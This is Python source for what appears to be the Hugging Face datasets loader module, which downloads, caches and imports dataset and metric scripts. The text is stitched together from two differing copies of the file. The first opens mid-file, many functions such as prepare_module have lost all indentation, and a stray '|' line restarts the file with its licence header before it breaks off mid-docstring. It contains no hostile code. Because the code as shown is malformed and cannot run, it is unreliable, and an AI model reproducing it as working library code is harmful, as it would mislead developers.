from .utils.logging import get_logger
from .utils.version import Version
if config.AIOHTTP_AVAILABLE:
from .streaming import extend_module_for_streaming
logger = get_logger(__name__)
def init_dynamic_modules(
    name: str = config.MODULE_NAME_FOR_DYNAMIC_MODULES, hf_modules_cache: Optional[Union[Path, str]] = None
):
    """Create an importable module named *name* for dynamically added datasets/metrics.

    The module directory lives under the HF modules cache
    (~/.cache/huggingface/modules by default); pass ``hf_modules_cache`` to
    place it in another directory.  Returns the path to the module directory.
    """
    hf_modules_cache = init_hf_modules(hf_modules_cache)
    dynamic_modules_path = os.path.join(hf_modules_cache, name)
    os.makedirs(dynamic_modules_path, exist_ok=True)
    init_py = os.path.join(dynamic_modules_path, "__init__.py")
    if not os.path.exists(init_py):
        # An (empty) __init__.py makes the directory importable as a package.
        open(init_py, "w").close()
    return dynamic_modules_path
def import_main_class(module_path, dataset=True) -> Optional[Union[Type[DatasetBuilder], Type[Metric]]]:
    """Import the module at *module_path* and return its main class.

    The main class is the first concrete (non-abstract) subclass of
    DatasetBuilder (when *dataset* is True) or Metric (when False) found in
    the module's namespace; None when the module defines neither.
    """
    module = importlib.import_module(module_path)
    main_cls_type = DatasetBuilder if dataset else Metric
    for obj in module.__dict__.values():
        if isinstance(obj, type) and issubclass(obj, main_cls_type) and not inspect.isabstract(obj):
            return obj
    return None
def files_to_hash(file_paths: List[str]) -> str:
    """
    Convert a list of scripts or text files provided in file_paths into a hashed filename in a repeatable way.
    """
    # Expand any directories into the python files they contain (recursive,
    # case-insensitive .py match).
    candidate_files: List[Union[Path, str]] = []
    for file_path in file_paths:
        if os.path.isdir(file_path):
            candidate_files.extend(Path(file_path).rglob("*.[pP][yY]"))
        else:
            candidate_files.append(file_path)
    # Hash the concatenated source lines of every candidate file.
    lines = []
    for candidate in candidate_files:
        with open(candidate, mode="r", encoding="utf-8") as f:
            lines.extend(f.readlines())
    return hash_python_lines(lines)
def convert_github_url(url_path: str) -> Tuple[str, Optional[str]]:
    """Convert a link to a file on a github repo in a link to the raw github object."""
    parsed = urlparse(url_path)
    sub_directory = None
    if parsed.scheme in ("http", "https", "s3") and parsed.netloc == "github.com":
        if "blob" in url_path:
            # Direct file link: must be a python file; point at the raw view.
            assert url_path.endswith(
                ".py"
            ), f"External import from github at {url_path} should point to a file ending with '.py'"
            url_path = url_path.replace("blob", "raw")
        else:
            # Repository link: rewrite to the zip archive of the branch
            # ("master" unless a /tree/<branch> segment names one).
            github_path = parsed.path[1:]
            if "/tree/" in github_path:
                repo_info, branch = github_path.split("/tree/")
            else:
                repo_info, branch = github_path, "master"
            repo_owner, repo_name = repo_info.split("/")
            url_path = f"https://github.com/{repo_owner}/{repo_name}/archive/{branch}.zip"
            sub_directory = f"{repo_name}-{branch}"
    return url_path, sub_directory
def get_imports(file_path: str):
    r"""Find whether we should import or clone additional files for a given processing script.
        And list the import.

    We allow:
    - library dependencies,
    - local dependencies and
    - external dependencies whose url is specified with a comment starting from "# From:' followed by the raw url to a file, an archive or a github repository.
        external dependencies will be downloaded (and extracted if needed in the dataset folder).
        We also add an `__init__.py` to each sub-folder of a downloaded folder so the user can import from them in the script.

    Note that only direct import in the dataset processing script will be handled
    We don't recursively explore the additional import to download further files.

    Examples::

        import tensorflow
        import .c4_utils
        import .clicr.dataset-code.build_json_dataset  # From: https://raw.githubusercontent.com/clips/clicr/master/dataset-code/build_json_dataset
    """
    lines = []
    with open(file_path, mode="r", encoding="utf-8") as f:
        lines.extend(f.readlines())

    logger.debug("Checking %s for additional imports.", file_path)
    # Each entry is (type, module_name, path_or_url, sub_directory) where
    # type is one of "library" / "internal" / "external".
    imports: List[Tuple[str, str, str, Optional[str]]] = []
    is_in_docstring = False
    for line in lines:
        # A line containing an odd '"""' toggles docstring state; matches on
        # a line that both opens and closes a docstring count twice and so
        # leave the state unchanged.
        docstr_start_match = re.findall(r'[\s\S]*?"""[\s\S]*?', line)

        if len(docstr_start_match) == 1:
            # flip True <=> False only if doctstring
            # starts at line without finishing
            is_in_docstring = not is_in_docstring

        if is_in_docstring:
            # import statements in doctstrings should
            # not be added as required dependencies
            continue

        # Group 1: leading '.' (relative import), group 2: module name,
        # group 3: optional "# From: <url>" annotation.
        match = re.match(r"^import\s+(\.?)([^\s\.]+)[^#\r\n]*(?:#\s+From:\s+)?([^\r\n]*)", line, flags=re.MULTILINE)
        if match is None:
            match = re.match(
                r"^from\s+(\.?)([^\s\.]+)(?:[^\s]*)\s+import\s+[^#\r\n]*(?:#\s+From:\s+)?([^\r\n]*)",
                line,
                flags=re.MULTILINE,
            )
            if match is None:
                continue
        if match.group(1):
            # The import starts with a '.', we will download the relevant file
            if any(imp[1] == match.group(2) for imp in imports):
                # We already have this import
                continue
            if match.group(3):
                # The import has a comment with 'From:', we'll retrieve it from the given url
                url_path = match.group(3)
                url_path, sub_directory = convert_github_url(url_path)
                imports.append(("external", match.group(2), url_path, sub_directory))
            elif match.group(2):
                # The import should be at the same place as the file
                imports.append(("internal", match.group(2), match.group(2), None))
        else:
            if match.group(3):
                # The import has a comment with `From: git+https:...`, asks user to pip install from git.
                url_path = match.group(3)
                imports.append(("library", match.group(2), url_path, None))
            else:
                imports.append(("library", match.group(2), match.group(2), None))

    return imports
def prepare_module(
path: str,
script_version: Optional[Union[str, Version]] = None,
download_config: Optional[DownloadConfig] = None,
download_mode: Optional[GenerateMode] = None,
dataset: bool = True,
force_local_path: Optional[str] = None,
dynamic_modules_path: Optional[str] = None,
return_resolved_file_path: bool = False,
**download_kwargs,
) -> Union[Tuple[str, str], Tuple[str, str, Optional[str]]]:
r"""
Download/extract/cache a dataset (if dataset==True) or a metric (if dataset==False)
Dataset and metrics codes are cached inside the the dynamic modules cache to allow easy import (avoid ugly sys.path tweaks)
and using cloudpickle (among other things).
Args:
path (str):
path to the dataset or metric script, can be either:
- a path to a local directory containing the dataset processing python script
- an url to a github or S3 directory with a dataset processing python script
script_version (Optional ``Union[str, datasets.Version]``):
If specified, the module will be loaded from the datasets repository at this version.
By default:
- it is set to the local version fo the lib.
- it will also try to load it from the master branch if it's not available at the local version fo the lib.
Specifying a version that is different from your local version of the lib might cause compatibility issues.
download_config (Optional ``datasets.DownloadConfig``: specific download configuration parameters.
dataset (bool): True if the script to load is a dataset, False if the script is a metric.
force_local_path (Optional str): Optional path to a local path to download and prepare the script to.
Used to inspect or modify the script folder.
dynamic_modules_path (Optional str, defaults to HF_MODULES_CACHE / "datasets_modules", i.e. ~/.cache/huggingface/modules/datasets_modules):
Optional path to the directory in which the dynamic modules are saved. It must have been initialized with :obj:`init_dynamic_modules`.
By default the datasets and metrics are stored inside the `datasets_modules` module.
return_resolved_file_path (Optional bool, defaults to False):
If True, the url or path to the resolved dataset or metric script is returned with the other ouputs
download_kwargs: optional attributes for DownloadConfig() which will override the attributes in download_config if supplied.
Return: Tuple[``str``, ``str``] with
1. The module path being
- the import path of the dataset/metric package if force_local_path is False: e.g. 'datasets.datasets.squad'
- the local path to the dataset/metric file if force_local_path is True: e.g. '/User/huggingface/datasets/datasets/squad/squad.py'
2. A hash string computed from the content of the dataset loading script.
"""
if download_config is None:
download_config = DownloadConfig(**download_kwargs)
download_config.extract_compressed_file = True
download_config.force_extract = True
module_type = "dataset" if dataset else "metric"
name = list(filter(lambda x: x, path.replace(os.sep, "/").split("/")))[-1]
if not name.endswith(".py"):
name = name + ".py"
# Short name is name without the '.py' at the end (for the module)
short_name = name[:-3]
# first check if the module is packaged with the `datasets` package
if dataset and path in _PACKAGED_DATASETS_MODULES:
try:
head_hf_s3(path, filename=name, dataset=dataset, max_retries=download_config.max_retries)
except Exception:
logger.debug(f"Couldn't head HF s3 for packaged dataset module '{path}'. Running in offline mode.")
module_path, hash = _PACKAGED_DATASETS_MODULES[path]
if return_resolved_file_path:
return module_path, hash, None
return module_path, hash
# otherwise the module is added to the dynamic modules
dynamic_modules_path = dynamic_modules_path if dynamic_modules_path else init_dynamic_modules()
module_name_for_dynamic_modules = os.path.basename(dynamic_modules_path)
datasets_modules_path = os.path.join(dynamic_modules_path, "datasets")
datasets_modules_name = module_name_for_dynamic_modules + ".datasets"
metrics_modules_path = os.path.join(dynamic_modules_path, "metrics")
metrics_modules_name = module_name_for_dynamic_modules + ".metrics"
if force_local_path is None:
main_folder_path = os.path.join(datasets_modules_path if dataset else metrics_modules_path, short_name)
else:
main_folder_path = force_local_path
# We have three ways to find the processing file:
# - if os.path.join(path, name) is a file or a remote url
# - if path is a file or a remote url
# - otherwise we assume path/name is a path to our S3 bucket
combined_path = os.path.join(path, name)
if os.path.isfile(combined_path):
file_path = combined_path
local_path = file_path
elif os.path.isfile(path):
file_path = path
local_path = path
else:
# Try github (canonical datasets/metrics) and then S3 (users datasets/metrics)
try:
head_hf_s3(path, filename=name, dataset=dataset, max_retries=download_config.max_retries)
script_version = str(script_version) if script_version is not None else None
if path.count("/") == 0: # canonical datasets/metrics: github path
file_path = hf_github_url(path=path, name=name, dataset=dataset, version=script_version)
try:
local_path = cached_path(file_path, download_config=download_config)
except FileNotFoundError:
if script_version is not None:
raise FileNotFoundError(
"Couldn't find remote file with version {} at {}. Please provide a valid version and a valid {} name".format(
script_version, file_path, "dataset" if dataset else "metric"
)
)
else:
github_file_path = file_path
file_path = hf_github_url(path=path, name=name, dataset=dataset, version="master")
try:
local_path = cached_path(file_path, download_config=download_config)
logger.warning(
"Couldn't find file locally at {}, or remotely at {}.\n"
"The file was picked from the master branch on github instead at {}.".format(
combined_path, github_file_path, file_path
)
)
except FileNotFoundError:
raise FileNotFoundError(
"Couldn't find file locally at {}, or remotely at {}.\n"
"The file is also not present on the master branch on github.".format(
combined_path, github_file_path
)
)
elif path.count("/") == 1: # users datasets/metrics: s3 path (hub for datasets and s3 for metrics)
if dataset:
file_path = hf_hub_url(path=path, name=name, version=script_version)
else:
file_path = hf_bucket_url(path, filename=name, dataset=False)
try:
local_path = cached_path(file_path, download_config=download_config)
except FileNotFoundError:
raise FileNotFoundError(
"Couldn't find file locally at {}, or remotely at {}. Please provide a valid {} name".format(
combined_path, file_path, "dataset" if dataset else "metric"
)
)
else:
raise FileNotFoundError(
"Couldn't find file locally at {}. Please provide a valid {} name".format(
combined_path, "dataset" if dataset else "metric"
)
)
except Exception as e: # noqa: all the attempts failed, before raising the error we should check if the module already exists.
if os.path.isdir(main_folder_path):
hashes = [h for h in os.listdir(main_folder_path) if len(h) == 64]
if hashes:
# get most recent
def _get_modification_time(module_hash):
return (Path(main_folder_path) / module_hash / name).stat().st_mtime
hash = sorted(hashes, key=_get_modification_time)[-1]
module_path = ".".join(
[datasets_modules_name if dataset else metrics_modules_name, short_name, hash, short_name]
)
logger.warning(
f"Using the latest cached version of the module from {os.path.join(main_folder_path, hash)} "
f"(last modified on {time.ctime(_get_modification_time(hash))}) since it "
f"couldn't be found locally at {combined_path} or remotely ({type(e).__name__})."
)
if return_resolved_file_path:
with open(os.path.join(main_folder_path, hash, short_name + ".json")) as cache_metadata:
file_path = json.load(cache_metadata)["original file path"]
return module_path, hash, file_path
return module_path, hash
raise
# Load the module in two steps:
# 1. get the processing file on the local filesystem if it's not there (download to cache dir)
# 2. copy from the local file system inside the modules cache to import it
base_path = url_or_path_parent(file_path) # remove the filename
dataset_infos = url_or_path_join(base_path, config.DATASETDICT_INFOS_FILENAME)
# Download the dataset infos file if available
try:
local_dataset_infos_path = cached_path(
dataset_infos,
download_config=download_config,
)
except (FileNotFoundError, ConnectionError):
local_dataset_infos_path = None
# Download external imports if needed
imports = get_imports(local_path)
local_imports = []
library_imports = []
for import_type, import_name, import_path, sub_directory in imports:
if import_type == "library":
library_imports.append((import_name, import_path)) # Import from a library
continue
if import_name == short_name:
raise ValueError(
f"Error in {module_type} script at {file_path}, importing relative {import_name} module "
f"but {import_name} is the name of the {module_type} script. "
f"Please change relative import {import_name} to another name and add a '# From: URL_OR_PATH' "
f"comment pointing to the original realtive import file path."
)
if import_type == "internal":
url_or_filename = url_or_path_join(base_path, import_path + ".py")
elif import_type == "external":
url_or_filename = import_path
else:
raise ValueError("Wrong import_type")
local_import_path = cached_path(
url_or_filename,
download_config=download_config,
)
if sub_directory is not None:
local_import_path = os.path.join(local_import_path, sub_directory)
local_imports.append((import_name, local_import_path))
# Check library imports
needs_to_be_installed = []
for library_import_name, library_import_path in library_imports:
try:
lib = importlib.import_module(library_import_name) # noqa F841
except ImportError:
needs_to_be_installed.append((library_import_name, library_import_path))
if needs_to_be_installed:
raise ImportError(
f"To be able to use this {module_type}, you need to install the following dependencies"
f"{[lib_name for lib_name, lib_path in needs_to_be_installed]} using 'pip install "
f"{" ".join([lib_path for lib_name, lib_path in needs_to_be_installed])}' for instance'"
)
# Define a directory with a unique name in our dataset or metric folder
# path is: ./datasets|metrics/dataset|metric_name/hash_from_code/script.py
# we use a hash to be able to have multiple versions of a dataset/metric processing file together
hash = files_to_hash([local_path] + [loc[1] for loc in local_imports])
if force_local_path is None:
hash_folder_path = os.path.join(main_folder_path, hash)
else:
hash_folder_path = force_local_path
local_file_path = os.path.join(hash_folder_path, name)
dataset_infos_path = os.path.join(hash_folder_path, config.DATASETDICT_INFOS_FILENAME)
# Prevent parallel disk operations
lock_path = local_path + ".lock"
with FileLock(lock_path):
# Create main dataset/metrics folder if needed
if download_mode == GenerateMode.FORCE_REDOWNLOAD and os.path.exists(main_folder_path):
shutil.rmtree(main_folder_path)
if not os.path.exists(main_folder_path):
logger.info(f"Creating main folder for {module_type} {file_path} at {main_folder_path}")
os.makedirs(main_folder_path, exist_ok=True)
else:
logger.info(f"Found main folder for {module_type} {file_path} at {main_folder_path}")
# add an __init__ file to the main dataset folder if needed
init_file_path = os.path.join(main_folder_path, "__init__.py")
if not os.path.exists(init_file_path):
with open(init_file_path, "w"):
pass
# Create hash dataset folder if needed
if not os.path.exists(hash_folder_path):
logger.info(f"Creating specific version folder for {module_type} {file_path} at {hash_folder_path}")
os.makedirs(hash_folder_path)
else:
logger.info(f"Found specific version folder for {module_type} {file_path} at {hash_folder_path}")
# add an __init__ file to the hash dataset folder if needed
init_file_path = os.path.join(hash_folder_path, "__init__.py")
if not os.path.exists(init_file_path):
with open(init_file_path, "w"):
pass
# Copy dataset.py file in hash folder if needed
if not os.path.exists(local_file_path):
logger.info("Copying script file from %s to %s", file_path, local_file_path)
shutil.copyfile(local_path, local_file_path)
else:
logger.info("Found script file from %s to %s", file_path, local_file_path)
# Copy dataset infos file if needed
if not os.path.exists(dataset_infos_path):
if local_dataset_infos_path is not None:
logger.info("Copying dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
shutil.copyfile(local_dataset_infos_path, dataset_infos_path)
else:
logger.info("Couldn't find dataset infos file at %s", dataset_infos)
else:
if local_dataset_infos_path is not None and not filecmp.cmp(local_dataset_infos_path, dataset_infos_path):
logger.info("Updating dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
shutil.copyfile(local_dataset_infos_path, dataset_infos_path)
else:
logger.info("Found dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
# Record metadata associating original dataset path with local unique folder
meta_path = local_file_path.split(".py")[0] + ".json"
if not os.path.exists(meta_path):
logger.info(f"Creating metadata file for {module_type} {file_path} at {meta_path}")
meta = {"original file path": file_path, "local file path": local_file_path}
# the filename is *.py in our case, so better rename to filenam.json instead of filename.py.json
with open(meta_path, "w", encoding="utf-8") as meta_file:
json.dump(meta, meta_file)
else:
logger.info(f"Found metadata file for {module_type} {file_path} at {meta_path}")
# Copy all the additional imports
for import_name, import_path in local_imports:
if os.path.isfile(import_path):
full_path_local_import = os.path.join(hash_folder_path, import_name + ".py")
if not os.path.exists(full_path_local_import):
logger.info("Copying local import file from %s at %s", import_path, full_path_local_import)
shutil.copyfile(import_path, full_path_local_import)
else:
logger.info("Found local import file from %s at %s", import_path, full_path_local_import)
elif os.path.isdir(import_path):
full_path_local_import = os.path.join(hash_folder_path, import_name)
if not os.path.exists(full_path_local_import):
logger.info("Copying local import directory from %s at %s", import_path, full_path_local_import)
shutil.copytree(import_path, full_path_local_import)
else:
logger.info("Found local import directory from %s at %s", import_path, full_path_local_import)
else:
raise OSError(f"Error with local import at {import_path}")
if force_local_path is None:
module_path = ".".join(
[datasets_modules_name if dataset else metrics_modules_name, short_name, hash, short_name]
)
else:
module_path = local_file_path
# make the new module to be noticed by the import system
importlib.invalidate_caches()
if return_resolved_file_path:
return module_path, hash, file_path
return module_path, hash
def load_metric(
    path: str,
    config_name: Optional[str] = None,
    process_id: int = 0,
    num_process: int = 1,
    cache_dir: Optional[str] = None,
    experiment_id: Optional[str] = None,
    keep_in_memory: bool = False,
    download_config: Optional[DownloadConfig] = None,
    download_mode: Optional[GenerateMode] = None,
    script_version: Optional[Union[str, Version]] = None,
    **metric_init_kwargs,
) -> Metric:
    r"""Load a `datasets.Metric`.

    Args:
        path (``str``): Path to the metric processing script with the metric builder. Can be either:

            - a local path to a processing script or to the directory containing the script
              (if the script has the same name as the directory),
              e.g. ``'./metrics/rouge'`` or ``'./metrics/rogue/rouge.py'``
            - a metric identifier on the HuggingFace datasets repo
              (list all available metrics with ``datasets.list_metrics()``), e.g. ``'rouge'`` or ``'bleu'``
        config_name (Optional ``str``): Configuration to select for the metric
            (e.g. the GLUE metric has one configuration per subset).
        process_id (Optional ``int``): For distributed evaluation: id of the process.
        num_process (Optional ``int``): For distributed evaluation: total number of processes.
        cache_dir (Optional str): Path to store the temporary predictions and references
            (defaults to `~/.cache/metrics/`).
        experiment_id (``str``): A specific experiment id, used when several distributed evaluations
            share the same file system. Useful to compute metrics in distributed setups
            (in particular non-additive metrics like F1).
        keep_in_memory (bool): Whether to store the temporary results in memory (defaults to False).
        download_config (Optional ``datasets.DownloadConfig``): Specific download configuration parameters.
        download_mode (Optional `datasets.GenerateMode`): Select the download/generate mode -
            defaults to REUSE_DATASET_IF_EXISTS.
        script_version (Optional ``Union[str, datasets.Version]``): If specified, the module is loaded
            from the datasets repository at this version. By default it is set to the local version of
            the lib. Specifying a version that is different from your local version of the lib might
            cause compatibility issues.

    Returns:
        `datasets.Metric`
    """
    # Resolve (download/extract/cache) the metric processing script and import its main class.
    module_path, module_hash = prepare_module(
        path,
        script_version=script_version,
        download_config=download_config,
        download_mode=download_mode,
        dataset=False,
    )
    metric_cls = import_main_class(module_path, dataset=False)
    # Instantiate the metric with the distributed-evaluation / caching parameters.
    metric = metric_cls(
        config_name=config_name,
        process_id=process_id,
        num_process=num_process,
        cache_dir=cache_dir,
        keep_in_memory=keep_in_memory,
        experiment_id=experiment_id,
        **metric_init_kwargs,
    )
    # Fetch any external resources the metric needs before returning it.
    metric.download_and_prepare(download_config=download_config)
    return metric
def load_dataset(
    path: str,
    name: Optional[str] = None,
    data_dir: Optional[str] = None,
    data_files: Optional[Union[Dict, List]] = None,
    split: Optional[Union[str, Split]] = None,
    cache_dir: Optional[str] = None,
    features: Optional[Features] = None,
    download_config: Optional[DownloadConfig] = None,
    download_mode: Optional[GenerateMode] = None,
    ignore_verifications: bool = False,
    keep_in_memory: Optional[bool] = None,
    save_infos: bool = False,
    script_version: Optional[Union[str, Version]] = None,
    use_auth_token: Optional[Union[bool, str]] = None,
    task: Optional[Union[str, TaskTemplate]] = None,
    streaming: bool = False,
    **config_kwargs,
) -> Union[DatasetDict, Dataset, IterableDatasetDict, IterableDataset]:
    """Load a dataset.

    This method does the following under the hood:

        1. Download and import in the library the dataset loading script from ``path`` if it's not already cached inside the library.

            Processing scripts are small python scripts that define the citation, info and format of the dataset,
            contain the URL to the original data files and the code to load examples from the original data files.

            You can find some of the scripts here: https://github.com/huggingface/datasets/datasets
            and easily upload yours to share them using the CLI ``huggingface-cli``.
            You can find the complete list of datasets in the Datasets Hub at https://huggingface.co/datasets

        2. Run the dataset loading script which will:

            * Download the dataset file from the original URL (see the script) if it's not already downloaded and cached.
            * Process and cache the dataset in typed Arrow tables for caching.

                Arrow tables are arbitrarily long, typed tables which can store nested objects and be mapped to numpy/pandas/python standard types.
                They can be directly accessed from drive, loaded in RAM or even streamed over the web.

        3. Return a dataset built from the requested splits in ``split`` (default: all).

    Args:
        path (:obj:`str`): Path to the dataset processing script with the dataset builder. Can be either:

            - a local path to processing script or the directory containing the script (if the script has the same name as the directory),
              e.g. ``'./dataset/squad'`` or ``'./dataset/squad/squad.py'``.
            - a dataset identifier in the HuggingFace Datasets Hub (list all available datasets and ids with ``datasets.list_datasets()``)
              e.g. ``'squad'``, ``'glue'`` or ``'openai/webtext'``.
        name (:obj:`str`, optional): Defining the name of the dataset configuration.
        data_files (:obj:`str`, optional): Defining the data_files of the dataset configuration.
        data_dir (:obj:`str`, optional): Defining the data_dir of the dataset configuration.
        split (:class:`Split` or :obj:`str`): Which split of the data to load.
            If None, will return a `dict` with all splits (typically `datasets.Split.TRAIN` and `datasets.Split.TEST`).
            If given, will return a single Dataset.
            Splits can be combined and specified like in tensorflow-datasets.
        cache_dir (:obj:`str`, optional): Directory to read/write data. Defaults to "~/datasets".
        features (:class:`Features`, optional): Set the features type to use for this dataset.
        download_config (:class:`~utils.DownloadConfig`, optional): Specific download configuration parameters.
        download_mode (:class:`GenerateMode`, optional): Select the download/generate mode - Default to REUSE_DATASET_IF_EXISTS
        ignore_verifications (:obj:`bool`, default ``False``): Ignore the verifications of the downloaded/processed dataset information (checksums/size/splits/...).
        keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset
            will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to
            nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section.
        save_infos (:obj:`bool`, default ``False``): Save the dataset information (checksums/size/splits/...).
        script_version (:class:`~utils.Version` or :obj:`str`, optional): Version of the dataset script to load:

            - For canonical datasets in the `huggingface/datasets` library like "squad", the default version of the module is the local version of the lib.
              You can specify a different version from your local version of the lib (e.g. "master" or "1.2.0") but it might cause compatibility issues.
            - For community provided datasets like "lhoestq/squad" that have their own git repository on the Datasets Hub, the default version "main" corresponds to the "main" branch.
              You can specify a different version than the default "main" by using a commit sha or a git tag of the dataset repository.
        use_auth_token (``str`` or ``bool``, optional): Optional string or boolean to use as Bearer token for remote files on the Datasets Hub.
            If True, will get token from `"~/.huggingface"`.
        task (``str``): The task to prepare the dataset for during training and evaluation. Casts the dataset's :class:`Features` to standardized column names and types as detailed in :py:mod:`datasets.tasks`.
        streaming (``bool``, default ``False``): If set to True, don't download the data files. Instead, it streams the data progressively while
            iterating on the dataset. An IterableDataset or IterableDatasetDict is returned instead in this case.

            Note that streaming works for datasets that use data formats that support being iterated over like txt, csv, jsonl for example.
            Json files may be downloaded completely. Also streaming from remote zip or gzip files is supported but other compressed formats
            like rar and xz are not yet supported. The tgz format doesn't allow streaming.
        **config_kwargs: Keyword arguments to be passed to the :class:`BuilderConfig` and used in the :class:`DatasetBuilder`.

    Returns:
        :class:`Dataset` or :class:`DatasetDict`:
            if `split` is not None: the dataset requested,
            if `split` is None, a ``datasets.DatasetDict`` with each split.

        or :class:`IterableDataset` or :class:`IterableDatasetDict` if streaming=True:
            if `split` is not None: the dataset requested,
            if `split` is None, a ``datasets.streaming.IterableDatasetDict`` with each split.
    """
    # Saving infos implies re-running the verifications, so skip the (now redundant) checks.
    ignore_verifications = ignore_verifications or save_infos
    # Check that the streaming dependencies are available before doing any work.
    if streaming:
        if not config.AIOHTTP_AVAILABLE:
            raise ImportError(
                f"To be able to use dataset streaming, you need to install dependencies like aiohttp "
                f"using 'pip install datasets[streaming]' or 'pip install aiohttp' for instance"
            )
    # Download/copy dataset processing script
    module_path, hash, resolved_file_path = prepare_module(
        path,
        script_version=script_version,
        download_config=download_config,
        download_mode=download_mode,
        dataset=True,
        return_resolved_file_path=True,
        use_auth_token=use_auth_token,
    )
    # Set the base path for downloads as the parent of the script location
    if resolved_file_path is not None:
        base_path = url_or_path_parent(resolved_file_path)
    else:
        base_path = None
    # Get dataset builder class from the processing script
    builder_cls = import_main_class(module_path, dataset=True)
    # Instantiate the dataset builder
    builder_instance: DatasetBuilder = builder_cls(
        cache_dir=cache_dir,
        name=name,
        data_dir=data_dir,
        data_files=data_files,
        hash=hash,
        features=features,
        **config_kwargs,
    )
    # Return an iterable dataset in case of streaming (no download happens in this branch)
    if streaming:
        # this extends the open and os.path.join functions for data streaming
        extend_module_for_streaming(module_path, use_auth_token=use_auth_token)
        return builder_instance.as_streaming_dataset(
            split=split,
            base_path=base_path,
            use_auth_token=use_auth_token,
        )
    # Some datasets are already processed on the HF google storage.
    # Don't try downloading from google storage for the packaged datasets such as text, json, csv or pandas
    try_from_hf_gcs = path not in _PACKAGED_DATASETS_MODULES
    # Download and prepare data
    builder_instance.download_and_prepare(
        download_config=download_config,
        download_mode=download_mode,
        ignore_verifications=ignore_verifications,
        try_from_hf_gcs=try_from_hf_gcs,
        base_path=base_path,
        use_auth_token=use_auth_token,
    )
    # Build dataset for splits; small datasets may be kept in memory when not set explicitly
    keep_in_memory = (
        keep_in_memory if keep_in_memory is not None else is_small_dataset(builder_instance.info.dataset_size)
    )
    ds = builder_instance.as_dataset(split=split, ignore_verifications=ignore_verifications, in_memory=keep_in_memory)
    # Rename and cast features to match task schema
    if task is not None:
        ds = ds.prepare_for_task(task)
    if save_infos:
        builder_instance._save_infos()
    return ds
def load_from_disk(dataset_path: str, fs=None, keep_in_memory: Optional[bool] = None) -> Union[Dataset, DatasetDict]:
    """
    Load a dataset that was previously saved using ``dataset.save_to_disk(dataset_path)`` from a dataset
    directory, or from a filesystem using either :class:`datasets.filesystems.S3FileSystem` or any
    implementation of ``fsspec.spec.AbstractFileSystem``.

    Args:
        dataset_path (:obj:`str`): Path (e.g. ``"dataset/train"``) or remote uri (e.g.
            ``"s3://my-bucket/dataset/train"``) of the Dataset or DatasetDict directory where the dataset
            will be loaded from.
        fs (:class:`~filesystems.S3FileSystem` or ``fsspec.spec.AbstractFileSystem``, optional, default ``None``):
            Instance of the remote filesystem used to download the files from.
        keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the
            dataset will not be copied in-memory unless explicitly enabled by setting
            `datasets.config.IN_MEMORY_MAX_SIZE` to nonzero. See more details in the
            :ref:`load_dataset_enhancing_performance` section.

    Returns:
        ``datasets.Dataset`` or ``datasets.DatasetDict``:
            if `dataset_path` is a path of a dataset directory: the dataset requested,
            if `dataset_path` is a path of a dataset dict directory: a ``datasets.DatasetDict`` with each split.
    """
    # Resolve the filesystem: strip the scheme from remote uris (e.g. s3://), otherwise
    # default to the local filesystem and use the path as-is.
    if not is_remote_filesystem(fs):
        fs = fsspec.filesystem("file")
        resolved_path = dataset_path
    else:
        resolved_path = extract_path_from_uri(dataset_path)
    if not fs.exists(resolved_path):
        raise FileNotFoundError("Directory {} not found".format(dataset_path))
    # A single-Dataset directory contains the dataset info file, whereas a DatasetDict
    # directory contains the dataset-dict json file instead.
    if fs.isfile(Path(resolved_path, config.DATASET_INFO_FILENAME).as_posix()):
        return Dataset.load_from_disk(dataset_path, fs, keep_in_memory=keep_in_memory)
    if fs.isfile(Path(resolved_path, config.DATASETDICT_JSON_FILENAME).as_posix()):
        return DatasetDict.load_from_disk(dataset_path, fs, keep_in_memory=keep_in_memory)
    raise FileNotFoundError(
        "Directory {} is neither a dataset directory nor a dataset dict directory.".format(dataset_path)
    )
| # coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Access datasets."""
import filecmp
import importlib
import inspect
import json
import os
import re
import shutil
import time
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Type, Union
from urllib.parse import urlparse
import fsspec
from . import config
from .arrow_dataset import Dataset
from .builder import DatasetBuilder
from .dataset_dict import DatasetDict, IterableDatasetDict
from .features import Features
from .filesystems import extract_path_from_uri, is_remote_filesystem
from .iterable_dataset import IterableDataset
from .metric import Metric
from .packaged_modules import _PACKAGED_DATASETS_MODULES, hash_python_lines
from .splits import Split
from .tasks import TaskTemplate
from .utils.download_manager import GenerateMode
from .utils.file_utils import (
DownloadConfig,
cached_path,
head_hf_s3,
hf_bucket_url,
hf_github_url,
hf_hub_url,
init_hf_modules,
url_or_path_join,
url_or_path_parent,
)
from .utils.filelock import FileLock
from .utils.info_utils import is_small_dataset
from .utils.logging import get_logger
from .utils.version import Version
if config.AIOHTTP_AVAILABLE:
from .streaming import extend_module_for_streaming
logger = get_logger(__name__)
def init_dynamic_modules(
    name: str = config.MODULE_NAME_FOR_DYNAMIC_MODULES, hf_modules_cache: Optional[Union[Path, str]] = None
):
    """
    Create (if needed) and return the path of the package named `name` in which dynamic modules
    such as metrics or datasets can be added, so they can later be imported by module name.

    The package is created in the HF_MODULE_CACHE directory by default (~/.cache/huggingface/modules),
    but this can be overridden by passing a path to another directory in `hf_modules_cache`.
    """
    modules_root = init_hf_modules(hf_modules_cache)
    dynamic_modules_path = os.path.join(modules_root, name)
    os.makedirs(dynamic_modules_path, exist_ok=True)
    # The directory needs an __init__.py to be importable as a python package.
    init_path = os.path.join(dynamic_modules_path, "__init__.py")
    if not os.path.exists(init_path):
        with open(init_path, "w"):
            pass
    return dynamic_modules_path
def import_main_class(module_path, dataset=True) -> Optional[Union[Type[DatasetBuilder], Type[Metric]]]:
    """Import the module at `module_path` and return its main class:

    - a DatasetBuilder if `dataset` is True
    - a Metric if `dataset` is False

